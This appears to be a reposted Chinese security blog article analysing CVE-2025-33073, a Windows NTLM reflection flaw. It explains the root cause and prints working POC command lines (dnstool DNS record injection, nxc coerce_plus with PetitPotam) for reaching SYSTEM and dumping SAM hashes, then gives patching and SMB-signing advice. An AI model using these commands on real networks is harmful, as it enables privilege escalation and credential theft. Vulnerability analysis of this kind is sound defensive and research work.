文章总结: CVE-2025-33073是2025年6月披露的NTLM反射漏洞,CVSS评分为8.8。该漏洞源于Windows在NTLM认证中对本地连接判断逻辑存在缺陷,攻击者可通过构造特定DNS名称欺骗系统,使其误判认证为本地行为,从而绕过SMB签名等安全机制。利用该漏洞,域内普通用户可在未强制SMB签名的目标主机上触发认证反射,最终获取SYSTEM权限并实现横向移动。建议尽快部署微软2025年6月补丁并全域强制SMB签名以缓解风险。 综合评分: 95 文章分类: 漏洞分析,内网渗透,红队,安全建设,漏洞POC
NTLM反射漏洞拿Windows Server SYSTEM权限,CVE-2025-33073剖析
原创
Janice Janice
船山信安
2026年7月2日 12:15 广东
在小说阅读器读本章
去阅读
NTLM反射漏洞 CVE-2025-33073
一、背景:沉寂多年被重新炸开
NTLM反射早在2008 年微软就用MS08-068补过一轮,后续又堆上 SMB 签名和EPA加固,好多人以为这路子早封死了。实际上2025年6月补丁日曝出的CVE-2025-33073又把它挖开了,CVSS打到 8.8,最大的原因就是域内任意一台未强制SMB签名的主机都可能遭殃。
二、Windows本地NTLM判定的逻辑缺陷
漏洞根子在Windows判断NTLM认证是否本地的那套逻辑。系统拿主机名做比对,认定目标是自身就走本地NTLM模式,跳过挑战响应直接塞令牌进内存。
研究员发现塞一段精心构造的DNS名称就能搅乱这套判断,比如通过长串 localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA,Windows解析时剥离元数据只剩主机名,误判成本地连接。于是lsass.exe这种SYSTEM进程被强制向攻击者监听器做认证,令牌再经SMB反射回目标,SYSTEM权限到手。
三、低门槛、全自动化
3.1 攻击门槛
一个普通域用户账号就够用,前提是目标没开SMB签名。
3.2 利用流程
先用nxc的coerce_plus模块探一下签名状态和强制漏洞,再起ntlmrelayx监听中继,接着用dnstool注册那条畸形DNS记录,最后用PetitPotam或PrinterBug触发强制认证。
3.3 核心 POC 代码
核心POC代码长这样:
python3 dnstool.py -u 'shield.local\scarter' -p 'Passw0rd' dc4.shield.local -a add -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' -d 192.168.115.178 -dns-ip 192.168.115.180
DNS记录落位后触发认证:
nxc smb 192.168.115.185 -u scarter -p Passw0rd -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA
如果ntlmrelayx那边一旦认证成功,SAM哈希就会直接dump出来,后续拿本地管理员哈希就能横向全场。
GitHub上mverschu开源的CVE-2025-33073.py整合了整套流程,支持SOCKS模式和绕过SMB签名的LDAPS中继,一条命令就把DNS注册到反射提权全部涉及。
有意思的是即便开了 SMB 签名,移除数据包里的SIGN/SEAL标志后仍能从SMB中继到LDAPS,它的MIC防护也被绕了。
五、防御建议
微软补丁加强了SMB认证期间的DNS名称校验,可配置层面SMB签名没强制的环境依然大把存在。建议尽快部署2025年6月补丁并全域强制SMB签名,别留死角。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:船山信安 Janice Janice《NTLM反射漏洞拿Windows Server SYSTEM权限,CVE-2025-33073剖析》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。









评论